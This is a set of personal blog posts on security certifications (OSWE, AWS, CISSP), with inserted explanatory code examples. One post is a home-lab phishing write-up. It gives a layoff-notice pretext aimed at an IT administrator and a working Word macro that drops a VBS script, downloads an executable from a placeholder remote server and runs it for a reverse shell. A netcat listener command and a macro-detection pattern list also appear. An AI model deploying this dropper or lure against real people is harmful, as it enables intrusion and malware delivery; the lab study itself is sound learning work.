Potential Remote Command/Code Execution

  • Code Injection (Eval – Node.js)
  • Deserialization Bugs (Java, .NET)
  • SSTI
  • Unrestricted File Upload
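For the last item on the list, unrestricted file upload, the review question is what the upload handler checks before writing anything to disk. The following added example, not code from the post or the course, is a handler that makes the three checks a reviewer looks for: an allow-list of extensions (a deny-list of "dangerous" ones is what gets bypassed), file content that agrees with the claimed type, and a stored filename chosen by the server rather than taken from the client. The allow-list, size limit and sample uploads are constructed for the example.

```python
"""Validate an upload before anything touches the filesystem.

Added example, not code from the post or the course. The three checks are the
ones a white-box review of an upload handler looks for: an allow-list of
extensions, content that agrees with the claimed type, and a stored filename
chosen by the server rather than the client. Sample uploads are constructed.
"""
import os
import secrets

# Extension -> required leading bytes. Constructed allow-list for the example.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised with a short reason when an upload fails validation."""


def safe_upload_name(client_filename: str, content: bytes) -> str:
    """Return a server-generated filename for `content`, or raise UploadRejected."""
    if len(content) > MAX_BYTES:
        raise UploadRejected("too large")
    # Keep only the final path component; directory parts supplied by the client
    # (including ../ sequences) are never used.
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # A double extension such as name.php.png passes the allow-list because only
    # the last extension counts, so the leading bytes must agree with it as well.
    if not content.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # The client name is discarded entirely: the stored name is random and
    # carries only the validated extension.
    return f"{secrets.token_hex(16)}.{ext}"


def check(client_filename: str, content: bytes):
    """Return ("ok", stored_name) or ("rejected", reason)."""
    try:
        return "ok", safe_upload_name(client_filename, content)
    except UploadRejected as exc:
        return "rejected", str(exc)


# Constructed sample uploads.
SAMPLES = [
    ("avatar.png", ALLOWED["png"] + b"\x00" * 32),
    ("PHOTO.JPG", ALLOWED["jpg"] + b"\x00" * 32),
    ("../../config/settings.png", ALLOWED["png"] + b"\x00" * 32),
    ("script.php", b"<?php echo 1; ?>"),
    ("script.php.png", b"<?php echo 1; ?>"),
    ("noextension", ALLOWED["gif"]),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(f"{name:28} -> {check(name, data)}")
```

Each check closes a different gap: the allow-list stops unexpected types, the magic-byte comparison stops a script renamed with an image extension, and the server-generated name means traversal sequences or null bytes in the client's filename never reach a filesystem call.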

Hail Mary

  • User Defined Functions
  • 3rd Party Frameworks & Libraries
  • APIs
  • Client Side Attacks
  • Reversing Authentication
  • Brute Forcing Tokens
  • JSP Web Shells

Useful Bookmarks

All the blogs that I used to study. Shoutout to all the authors! Thank you.

Discord Server – https://discord.gg/EDsJkzz8tG

AWAE Hindsight

  • Offensive Security provides you with everything you need to pass the exam, but you will also learn new things during the exam
  • I didn’t feel the pain folks were experiencing about latency. I did not touch their Kali instance
  • Be ready to be rattled. Things aren’t in the regular places, named differently, paths are different. During the exam do not underestimate how much this can freak you out. Basic Terminal/PowerShell system administration knowledge is your friend – grep, find, writing regular expressions and locating processes
  • Writing the POCs takes the most time since you need to script the entire exploit in one shot. Even with a developer background this took the most time. If Python is your language of choice be sure to know requests inside & out and in particular the session object!
  • Set up local or remote debugging for each lab machine and script the entire exploitation in one shot. This means in one terminal nc -nvlp <port> and in another python main.py 192.168.1.1 and you receive a shell
  • Go through all the modules and where Offensive Security says, “after some time we zeroed in on this class”, actually go through the entire result set and try to analyze it as if you didn’t know which class contained the vulnerability. In the course it’s easy to say, “Oh they only had 40 results, I would have been able to filter through those” until it’s time to do that

Conclusion

As long as I’m more knowledgeable than I was prior to starting the course, I had a good time and a positive experience. No course is perfect so I don’t nit-pick. Some things exceeded my expectations, some didn’t. I would recommend the course since you can’t find any competing courses with the same focus. Thank you Offensive Security.

What’s Next

  • Windows Kernel Programming by the awesome Pavel Yosifovich. I purchased this and really liked it but got caught up. I’m going to finish it this time!
  • SANS 642 London December 2020 😛 Shoutout to my boss! He kept a SANS voucher for me on ice which I graciously used the day after submitting my OSWE report #whatbreak
  • I am waiting until the new Offensive Security Exploit Development course comes out early 2021. I’m more interested in that than the PEN-300 they just dropped.


The post OSWE Review (AWAE Course) appeared first on Certification Chronicles.

AWS Certification Trifecta

28 June 2020 at 11:20


When the dust settled here’s what I was left with 😛

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head), typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure and Google. It confirmed what I suspected, with AWS leading (~34%), Azure having roughly half of AWS (~17%), Google (~6%) and the “others” accounting for the rest. Note: Although Azure owns half of AWS in market share percentage, their annual growth (62%) is double that of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and proposed paths to achieve them. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty but I decided not to do that. Why? Figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view, so to speak. Security Specialty would be my end goal.

I fumbled my way through deploying AWS workloads previously. I used EC2 before (didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), S3 was cloud storage (that I constantly read about being misconfigured leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself 😅 which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.


AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practitioner. This involves a ton of sophisticated research better known as Google 🤣 in addition to trolling all related Reddit threads that I can find. This is how I narrow down what are the best materials to prepare with and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometimes I have to get outside of my own head. Not sure why I have all the confidence but it’s there (for no reason in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

    • What is the cloud & what they’re made of
    • IAM Users, Groups, Roles
    • VPCs
    • EC2
    • S3
    • Cloudfront & DNS
    • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From initial thought, it’s 5 days later. Exam scheduled for 1800 hrs. I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I click next on the last question to end the exam. AWS in a horrible play forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.


AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy; it would take a whole heap of studying to clear it. I followed a similar approach going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works because although Practitioner was easy it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was the most challenging cert of folks’ lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe impose some of the fear they had onto others who are coming behind them? One thing about me, I get tired of studying for the same thing quick. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one you go for it’s pretty much going deeper into the usage and capabilities of the appropriate related services. I chose to sit for C01; although C02 was recently released, I wasn’t going to risk being a live beta tester. I was concerned with the newer exam’s stability. As I write this C01 is officially dead in 3 days, July 1 2020; then all candidates will only have C02, good luck 🤣.

Date: Monday 05/14/2020 – 0800 hrs

5 days later after Practitioner (10 days total elapsed time from initial thought)

Okay I told you to keep reading 😂 I wish somebody would have stopped me. Since no one did the universe had to step in. In a cocky rage I take the exam after studying for only 5 days. Clicking through the survey I was heartbroken I had FAILED and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What 🤬 I only missed it by 20 points FML that made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retaken it the next day I would have passed (again idk why, maybe that’s my way of dealing with failure, going even further balls to the wall 🤣). The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing or anyone could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled and fueled me more.

I figured I needed to learn from an alternative source – I went to A Cloud Guru’s course which I felt was really light compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek the instructor is the 🐐 Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra 💗

Date: Monday 05/28/2020 – 0800 hrs

14 days later after 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know after this go around and how I maybe didn’t deserve the 700 the first time. I definitely was gunning for a perfect exam 😂. And I forgot to mention when you pass any AWS cert you get 50% off the next, so me failing the first one totally screwed up the financial efficiency; I had to pay full price for this one. I PASSED. But did you get the perfect score 🤔 I definitely didn’t feel like there was ANY question I didn’t know the answer for. Here’s what I woke up to the next day

God knew not to give me a perfect score! Probably would have done more harm than good 😂 I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH 👊🏾 This is how I was feeling at the moment!



Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind 💪🏾 I wished Stephane had created a course for the Security Specialty but he didn’t 😞 I went through the Linux Academy course. After that, I bought Jon Bonso’s course at Tutorials Dojo.

Listen. LISTEN. 🗣🔊 LISTEN. The length of these questions is in-freaking-sane. I remember one night losing track of time, completing only like 20 questions but over 2 hours had elapsed. It quickly negged me out. I love reading but my gosh these were monsters and the scenarios were ridiculous. I was like bump this, I’m not sure I really even want this thing that bad.


I took like 2 weeks off and came back to it! I wondered if I had forgotten all the things I had learned from the course; I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. Eliminated all distractions once again – nobody can get a hold of me and every ounce of free time is devoted to the task at hand. After completing all the questions there I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8 so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case I failed 🤣🤞🏾 so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later on that day at about 1400 hrs, I don’t know why but I went back to the exam scheduling and saw they had an exam slot for the same day at 1545 hrs 😲 Forget it! I rescheduled it and confirmed it. As soon as I did that I thought, “why the hell did you do that”?

If it was one thing I knew it was this. I was going to be even more disappointed than I was when I came up short for Solutions Architect for the first time. I imagine it would have been something like this after failing.


Exam was TOUGH. No other way to put it and guess what? Every single question was a monster just like the Bonso questions. 2 paragraphs minimum, sometimes like four, tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely and one thing I think could have pushed me over the bridge for Solutions Architect that’s UNDERRATED is the “Whiteboard” feature on Pearson exams. I used that thing for mostly every question for Security Specialty. Unless you’re a Jedi it’s really tough to have a good understanding of what the monster is asking you without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time wise I breezed through Practitioner in ~35 minutes, Solutions Architect ~55 minutes, and this thing #bruh I remember looking up thinking sheesh you’re two hours deep. I had finally finished all 65 questions. Enter second guessing yourself:

I’m not clicking next or ending the exam this time! There were maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen – reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like playing Russian roulette. I changed about 9 answers total, each one filled with a thought, “You’re probably on the borderline right now, you’re going to change an answer that’s correct, make it wrong and that’s going to be your demise”. It’s worth mentioning that only, say, 50% of the questions are single choice. The others are select the best 2 or 3 out of 6 or 7 selections. The questions are random from a bank like most of the exams so I’m not sure if the same will apply to you, but I did notice at least 2 instances where future questions cleared up previous ones. Example:

    • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
    • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare and contrast; you may get a bone thrown your way.

The majority of the exam was exactly that: reading and understanding policies. IAM, KMS and bucket policies – you had better be able to read and understand them as if they were plain English. There was a ton of KMS-related material; make SURE you know the nitty-gritty like imported key material, all the different KMS encryption types and when and where they apply, rotation etc.
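The cross-account bucket-policy questions above come down to applying a few evaluation rules to a concrete document: an explicit Deny beats any Allow, a Principal of "*" covers every account, and a request no statement matches is an implicit deny. The evaluator below is an added teaching example, not material from the post and not AWS's real policy engine; it ignores Condition blocks, identity-based policies, SCPs and the identity-side permissions a cross-account caller also needs, and the account ids (abc456, xyz123, evil999) and bucket name are constructed.

```python
"""Minimal S3 bucket-policy evaluator for exam-style reasoning.

Added example. Models only Effect, Principal ("*" or {"AWS": ...}),
Action and Resource with IAM-style wildcards; everything else a real
evaluation consults (Conditions, identity policies, SCPs) is left out.
"""
from fnmatch import fnmatchcase

# Constructed sample policy for the scenario above: account abc456 may
# upload objects, anyone may read them, account evil999 is explicitly
# denied everything. Account ids and bucket name are placeholders.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::abc456:root"},
         "Action": "s3:PutObject",
         "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Effect": "Allow",
         "Principal": "*",
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Effect": "Deny",
         "Principal": {"AWS": "arn:aws:iam::evil999:root"},
         "Action": "s3:*",
         "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
}


def _as_list(value):
    """Policy elements may be a single string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _principal_matches(principal, account_id):
    """True when the statement's Principal covers the requesting account.

    Accepts "*", a bare account id, or the account's root ARN.
    """
    if principal == "*":
        return True
    if not isinstance(principal, dict):
        return False
    for entry in _as_list(principal.get("AWS", [])):
        if entry in ("*", account_id, f"arn:aws:iam::{account_id}:root"):
            return True
    return False


def _any_match(patterns, value, case_sensitive):
    """IAM-style wildcard match ('*' and '?'). Actions are matched
    case-insensitively, resource ARNs exactly."""
    patterns = _as_list(patterns)
    if not case_sensitive:
        value = value.lower()
        patterns = [p.lower() for p in patterns]
    return any(fnmatchcase(value, p) for p in patterns)


def evaluate(policy, account_id, action, resource):
    """Return 'Allow', 'Deny' (explicit) or 'ImplicitDeny' for one request."""
    decision = "ImplicitDeny"
    for stmt in policy["Statement"]:
        if not _principal_matches(stmt.get("Principal", {}), account_id):
            continue
        if not _any_match(stmt["Action"], action, case_sensitive=False):
            continue
        if not _any_match(stmt["Resource"], resource, case_sensitive=True):
            continue
        if stmt["Effect"] == "Deny":
            return "Deny"          # explicit deny ends evaluation
        decision = "Allow"         # keep looking for a later Deny
    return decision


def accounts_without_access(policy, accounts, action, resource):
    """The 'which accounts would NOT be able to ...' form of the question."""
    return [a for a in accounts
            if evaluate(policy, a, action, resource) != "Allow"]


if __name__ == "__main__":
    obj = "arn:aws:s3:::example-bucket/report.pdf"
    for acct in ("abc456", "xyz123", "evil999"):
        print(acct, "PutObject ->", evaluate(SAMPLE_POLICY, acct, "s3:PutObject", obj),
              "| GetObject ->", evaluate(SAMPLE_POLICY, acct, "s3:GetObject", obj))
```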

Clicked next, through the survey and I had PASSED!


I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

  • CISSP 4/9
  • Cloud Practitioner 5/9
  • Solutions Architect 5/14
  • Security Specialty 6/26

Because of Covid-19 this will be the first year since I’ve not been poor 😂 (after graduating ~5 years) that I won’t be on an island celebrating. Such is life. I bought myself AWAE as a birthday gift; I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).


Free Cyber Materials BC Of Covid

11 April 2020 at 11:20

Hello Community,

Really terrible times we’re living in right now. It doesn’t help to literally be right in the “thick of it”. My family and I are unaffected at the moment. Praying for humanity at this point.

Anyways – there’s been a bunch of free goodies going on and I wouldn’t be proper if I didn’t attempt to put some of them in a central place to provide to others 👊🏼💯 Hats off to these organizations since none of this was required at all.

Leave a comment if you’ve found something I haven’t mentioned for others who visit after you. Stay Safe 📿🙏🏼


Note: I get no credit for any of this! I’m simply compiling the materials in one place for you


Pharm Raised Phish 😅🤠

31 March 2020 at 15:55

Life after CISSP:

I had so much housekeeping that I couldn’t attend to while studying (physically and digitally). My office was a complete mess. I lost access to my switch since there was a power outage and sadly I didn’t copy running-config to startup-config. Off my switch is basically everything besides wireless: my ESXi lab, my NAS, all my Raspberry Pis, and everything else. It’s tough to go from risk management to configuring ACLs and VLANs 🤣 Took me about a week to update (and save) the switch configuration, clean up my NAS, clean up all my machines & VMs, destroy my ESXi lab and rebuild it. Just like before, my ESXi lab simulates a corporate network, an Active Directory environment with an assortment of machines running various services. I use pfSense as a virtual firewall/router. This allows you to simulate someone attacking over the WAN and having your LAN protected by a security device just like normal. You can google security courses and CTFs to get an idea of typical lab environments. This is helpful because after you spend days importing/uploading/provisioning 5 VMs – now what? You still don’t have any services or applications running. This groundwork is fruitful; we all have to spend the time to stand things up before we can even begin to start thinking about playing around.


Keeping Busy:

I begin to think about what I want to learn more about. I find an Advanced Penetration book focusing on adversary emulation and APTs that I fell in love with. It’s ironic as well because the only reason this book stood out was that it was only 230 pages. I thought damn, either this thing is complete garbage and captures .01% of something irrelevant that some other guy loved, or it’s chock full of gems. It was the latter! My head’s spinning as we write our own VBA dropper, that writes a VBS file to the disk, that downloads the payload and executes a reverse shell. At the end of chapter one we’re on writing your own C2C infrastructure implementing libssh. Just something about seeing that hardcore C with the Windows API calls that brings fear and so much curiosity! Progressively improving our payloads and infrastructure as it progresses. Here’s the book

I bet you can see where this is going. To reinforce concepts I replicated the payloads and attack from the book in my lab environment.
Here’s the scenario:

  1. Somehow through password reuse you’ve gained access (attacker) to an organization’s webmail login
  2. As a budding hacker you understand situational awareness. Your target is an IT Administrator, who is probably already a little concerned over his job security, since through reconnaissance you’ve learned that 30% of the entire IT staff has already been furloughed since the pandemic began.
  3. You craft a fake Word document that seems to be a notice of this month’s layoffs and “mistakenly” send it to the administrator. You dress it up really nice with all the Confidential headers and footers. Of course there is no document; it’s a blurred image, and enabling macros is going to begin and carry out the compromise. It looks like this



    Payload:
    Sub AutoOpen()
        Dim PayloadFile As Integer
        Dim FilePath As String
        FilePath = "C:\tmp\payload.vbs"
        PayloadFile = FreeFile

        ' Create VBS dropper, write it to disk and execute it. VBS reaches out to remote server downloads payload and executes it.
        Open FilePath For Output As PayloadFile
        Print #PayloadFile, "HTTPDownload ""https://REMOTE-SERVER/PAYLOAD.EXE"", ""C:\tmp\"""
        Print #PayloadFile, ""
        Print #PayloadFile, "Sub HTTPDownload(myURL, myPath)"
        Print #PayloadFile, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg, currentChar,res,decoded_char"
        Print #PayloadFile, " Const ForReading = 1, ForWriting = 2, ForAppending = 8"
        Print #PayloadFile, " Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
        Print #PayloadFile, " If objFSO.FolderExists(myPath) Then"
        Print #PayloadFile, " strFile = objFSO.BuildPath(myPath,Mid(myURL,InStrRev( myURL,""/"")+ 1))"
        Print #PayloadFile, " ElseIf objFSO.FolderExists(Left(myPath,InStrRev( myPath, ""\"" )- 1)) Then"
        Print #PayloadFile, " strFile = myPath"
        Print #PayloadFile, " End If"
        Print #PayloadFile, ""
        Print #PayloadFile, " Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"
        Print #PayloadFile, " Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
        Print #PayloadFile, " objHTTP.Open ""GET"", myURL, False"
        Print #PayloadFile, " objHTTP.Send"
        Print #PayloadFile, ""
        Print #PayloadFile, " res = objHTTP.ResponseBody"
        Print #PayloadFile, " For i = 1 To LenB(objHTTP.ResponseBody)"
        Print #PayloadFile, " currentChar = Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"
        Print #PayloadFile, " objFile.Write currentChar"
        Print #PayloadFile, " Next"
        Print #PayloadFile, " objFile.Close( )"
        Print #PayloadFile, " Set WshShell = WScript.CreateObject(""WScript.Shell"")"
        Print #PayloadFile, " WshShell.Run ""C:\tmp\PAYLOAD.EXE""
        Print #PayloadFile, " End Sub"
        Close PayloadFile

        Shell "wscript c:\tmp\payload.vbs"
    End Sub


  4. The administrator viciously opens the email, the macro detonates, the payload executes and you get your reverse shell.
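From the defender’s side, the macro above chains a handful of behaviours that stand out in extracted VBA source: an auto-execute entry point, writing a script file to disk, an HTTP client object, WScript.Shell, and launching a process. The scanner below is an added example (not from the post or the book it cites) that flags those indicators in macro text; the two macro snippets are constructed test inputs, and the indicator weights and threshold are my own assumptions rather than a published rule set.

```python
"""Heuristic VBA macro triage: flag the behaviours a download-and-execute
dropper chains together.

Added defensive example. Operates on already-extracted VBA source text
(in practice the output of a macro extractor); it is not a replacement
for a real AV/sandbox verdict.
"""
import re

# Each indicator: (name, regex applied to the VBA source, weight).
# Weights and the verdict threshold are assumptions for this example.
INDICATORS = [
    ("auto_execute",   r'\bSub\s+(AutoOpen|Document_Open|Workbook_Open|Auto_Open)\b', 3),
    ("writes_file",    r'\bOpen\s+.+\bFor\s+(Output|Append|Binary)\b', 2),
    ("drops_script",   r'\.(vbs|js|bat|ps1|hta)\b', 2),
    ("http_client",    r'WinHttp\.WinHttpRequest|MSXML2\.(Server)?XMLHTTP|\.Open\s+""?GET', 2),
    ("wscript_shell",  r'WScript\.Shell', 2),
    # Shell "..." / .Run "..." but not the "Shell" inside WScript.Shell
    ("spawns_process", r'(?<!\.)\bShell\s*\(?\s*"|\.Run\s+"', 3),
    ("script_host",    r'\b[wc]script(\.exe)?\s+["\w]', 1),
]

# Constructed, non-functional snippet mirroring the dropper pattern above.
DROPPER_LIKE = r'''
Sub AutoOpen()
    Dim f As Integer
    f = FreeFile
    Open "C:\tmp\stage.vbs" For Output As f
    Print #f, "Set h = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
    Print #f, "h.Open ""GET"", ""https://EXAMPLE-HOST/STAGE2.EXE"", False"
    Print #f, "Set s = WScript.CreateObject(""WScript.Shell"")"
    Print #f, "s.Run ""C:\tmp\STAGE2.EXE"""
    Close f
    Shell "wscript C:\tmp\stage.vbs"
End Sub
'''

# Constructed benign macro: formats a worksheet, touches no files or processes.
BENIGN = '''
Sub FormatReport()
    Dim ws As Worksheet
    Set ws = ActiveSheet
    ws.Range("A1:D1").Font.Bold = True
    ws.Columns("A:D").AutoFit
End Sub
'''


def scan_macro(source):
    """Return {indicator_name: match_count} for every indicator present."""
    hits = {}
    for name, pattern, _weight in INDICATORS:
        count = len(re.findall(pattern, source, flags=re.IGNORECASE))
        if count:
            hits[name] = count
    return hits


def risk_score(source):
    """Sum the weights of the distinct indicators present (presence, not count)."""
    weights = {name: weight for name, _pattern, weight in INDICATORS}
    return sum(weights[name] for name in scan_macro(source))


def verdict(source, threshold=7):
    """Coarse classification; the threshold is an assumed cut-off."""
    return "suspicious" if risk_score(source) >= threshold else "benign"


if __name__ == "__main__":
    for label, src in (("dropper-like", DROPPER_LIKE), ("benign", BENIGN)):
        print(f"{label}: {verdict(src)} score={risk_score(src)} {scan_macro(src)}")
```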

Now that we’ve got a way to execute payloads, on to converting the payload into a C2 host and setting up the infrastructure! Here’s a video of the process.

How’d I Get Phished from S7acktrac3 on Vimeo.


Slayed CISSP

15 March 2020 at 23:03

I saw this day countless times in the last two months. Typing this blog post after passing the exam is a surreal feeling. Forecasting a goal, envisioning its completion, and driving it home is the stuff fairy-tales are made of. How the air smells at that time? What does it taste like? Why I deserve it? How all the countless hours of study I am willing to endure would eventually lead to pay-dirt and once again, me on top! Triumphant. How relieved I’d be? How much elation I’d be feeling. Like having a superpower to force anything I want into existence. Gotta have that vision!

I’ll get to what studying looked like, felt like, exam review dialogue and such soon. Yes! This post is LONG. But guess what I’m the one who had to write it. I didn’t do it for myself, I did it for you. The length was dictated by however many words I needed to produce a post with the context of what I would have wanted in hindsight after passing the exam. Most of the blogs I see are humble brags of people looking for everyone to kiss their feet since they passed it. Some are really good like the ones at the end of the post. Some are long and list out key things you should be on the lookout like CMMI or BCP without any other context. Continuing by saying how it was the MOST difficult test of their life, they felt like they were going to fail when the test ended. I just don’t think this is or has to be the typical case. Anyone can pass CISSP – keep reading and I’ll detail how to study and why most of the practice materials are broken. You could extrapolate something out of that too (if you only use the recommended study materials you will fail).

The point needs to be restated that I think the journey is the most valuable portion of attempting certifications, not the actual cert. This one, for instance, proves you are not only familiar with all the content from the 8 domains, but also able to synthesize and apply it to scenario-based situations using sound risk management principles acting as an Information Security Manager. Not only do I want to provide a valuable resource for exam preparation but also give you insight and texture into my life during the entire process.

Part-1: What’s My Motivation?

Time: Late December 2019

Self Introspection (self observation) – is important as it’s a kind of regular check on self development which helps you to know what we have achieved so far.

I was promoted in December 2019 to Application Security Manager 😛 (for context). Christmas is a really special time in the Caribbean so I try to be there every year during that holiday period. (That’s how you end the year baby 👊🏽) So literally the next day after getting home from the trip (still having a week off before I go back to work) I start to get the feeling. Anybody know what I’m talking bout? The thirst? Watch TV for maybe a few hours, go out a day, chill then it’s like “What am I doing with my life? What’s all this idle time I have? How do normal people do nothing for most of their lives? Happens to me every time 💯

I had preconceived thoughts about CISSP honestly. “It’s typical to fail on first try” … “It’s a management exam” … “It’s an inch deep mile wide”  … “Reddit horror stories”  … “Folks literally studying on average 6 months some 1 year”. After doing some research I decided it was the one for me. Not only would it give some sort of legitimacy to my new position, it would, in addition, significantly broaden my understanding of Information Security and Risk Management.

I ordered the following studying materials the same day based on research from CISSP sub-reddit:

Major S/O to that sub, it’s a trove of information! That’s part of why I blog. As to keep this process continually flowing. Provide helpful materials to those after you. We have to realize 90% of the time we’re acting as consumers not producers. I think it takes a certain level of appreciation for the field overall to be devoted to giving back in whatever form you can. We all have something we can contribute ‼

Life happened and I wasn’t able to start studying immediately. Shame because I got a free same-day delivery of the books. I never even opened the package when it came. Put it in my office and it sat there for most of January.

Part-2: What Was The Preparation Like?

Time: End of January 2020

Thinking about sports and basketball in particular – How many free throws might an average player shoot per day when trying to improve their percentage? 50 free throws per day? 100? 500? That number may actually be well around 2 thousand or more. Now let’s abstract that a little and dumb it down for a second. It’s not going to be anything novel. You need to consistently be shooting your free throws. In this case it’s all the practicing, reading all the materials from different sources, doing more practice questions, flashcards; it’s all a part of the process. You can’t go a weekend without studying, or even a day. Consistently & repeatedly!

You guys know by now, there’s nothing special about me; I just feel like when I really want something there’s an insatiable thirst to quench and borderline obsession maybe for me to get it. I guess what I’m trying to say is I know how to “Lock In”. I literally had hundreds of unanswered LinkedIn messages, DMs, texts, everything. I cut everybody off and focused on the task at hand. It would need my utmost attention at all times. There’s absolutely no going out, minimal TV; if I’m commuting I’m reading, if I’m on break I’m reading or researching, when I get home I’m getting settled at say 5 pm and then grinding till I’m dozing off. In bed I’m reading. When I wake up before I get out of bed I’m reading. Around this time is when you realize you could live with someone and be a complete stranger to them in the same house 😂 So some of the attributes that describe someone in this stage are consistency, dedication, resolve, discipline, resiliency.

You have to REALLY want it. When you do you are laser-focused. As random as this is, I see myself in my head as I’m typing this as a heat-seeking missile. I’m coming in hot and I will not miss! I care about accuracy and precision. You get the picture. Whatever it means to you – “Lock In” – that’s the mode you need to be in, keeping in mind it’s a marathon not a sprint. Life will happen; some days you’ll be much more motivated than others, but anything in your control better be related to CISSP.

  • Sybex Official Study Guide 8th Edition (8/10) – This behemoth took me about 2 weeks to finish. I didn’t read it intently but more skimming and identifying what I absolutely don’t know, or if I know something’s right for the wrong reason. You can register the Sybex book along w/ the practice test on the Wiley test bank. It allows you to take the chapter questions in the exam atmosphere instead of writing in the book, as well as practice exams. All your work is tracked and saved. After I finished reading the book I registered it and proceeded to go thru each domain’s chapter questions. I would say my average was in the 60’s for most of them. Bunch of new material, definitely a vast amount of knowledge you need for every single domain. I was familiar with the SDLC / Security Testing / IR domains from work-related experience. Gets two dings for being so damn big. Very useful but again it’s not something you can use alone to pass the exam despite it being the “Official Study Guide” 🤔
  • Kelly Handerhan’s (9/10) – Sadly these aren’t free anymore 😥 She really does an amazing job of relaying complex topics in an easily digestible manner. She also gives you the 2nd half of what you need to pass, the mindset. Even with the recent price change I still think this is worth however much it costs. You won’t read one Reddit or ISC2 post that doesn’t mention her. Gets a ding since you can’t pass the exam with this alone. Scored low on my first Sybex Practice after her videos. I spot checked which domains I was coming up short in and went back to read it in the Sybex book again.
  • Boson Test Engine (8/10) – One of the most valuable resources. Great bank of test questions that have amazing, well written, thorough explanations. The secret sauce here is no matter if you get an answer incorrect or not, you read the explanation. You’re confirming here if you were right for the wrong reason, or why you were wrong, or in what scenarios one of the other answers could possibly be right. That’s the beauty of Boson. This helps you identify where you’re weak. Guess what you do after? You use the book or another source (tons of material out there) to better understand whatever it is. The reason Boson gets 2 dings is that the beauty is in their explanations, not necessarily the questions, which in hindsight are way too technical, reminiscent of all the study material tests.
